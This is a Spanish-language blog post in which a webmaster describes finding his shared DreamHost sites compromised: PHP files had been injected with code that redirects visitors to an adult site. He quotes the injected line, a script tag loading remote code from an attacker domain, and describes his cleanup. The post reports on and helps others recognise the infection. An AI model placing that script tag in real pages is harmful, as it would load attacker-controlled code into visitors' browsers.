Ya perdí la cuenta de los servidores que fui comprando a lo largo de la historia y por motivos de tiempo (bueno… siendo sincero fiaca) nunca migré a un único servidor, quedandome con mas servidores que dedos en las manos.
Uno de estos servidores, es una cuenta shared en DreamHost donde tengo varios sitios de mi pasado inquieto y revoltoso.
Hace unos días entrando a uno de estos sitios para ver cómo estaba todo, descubro que el navegador me redirige a un sitio de adultos, tras haber cargado mi sitio. Raro. Pero no le dí importancia.
Días después, un amigo al que le alojo su sitio, me cuenta que muchos de sus usuarios tienen el mismo problema, al entrar en su sitio, me pasa lo mismo y veo en el código fuente del HTML la siguiente linea:
<script src="http://ators72guara.rr.nu/nl.php?p=d"></script>
¿WTF?
La parte mas extraña llegó cuando voy a editar el archivo PHP (un template de WordPress) para corregir el problema. La línea de código de arriba no está en el código fuente, sino que es generada por una función PHP que se metió en todos los archivos ejecutables PHP que tengo en mi cuenta de Dreamhost.
Por lo pronto estoy bajando todos los archivos y modificándolos en local para subirlos reparados, además de haber cambiado la contraseña de FTP y SSH.
Gracias Dreamhost por no haber avisado nada y mucho menos intentar solucionarme el problema ofreciendo algún backup reciente… ¡son unos copados!
PS, esto fue reportado en muchísimos sitios.
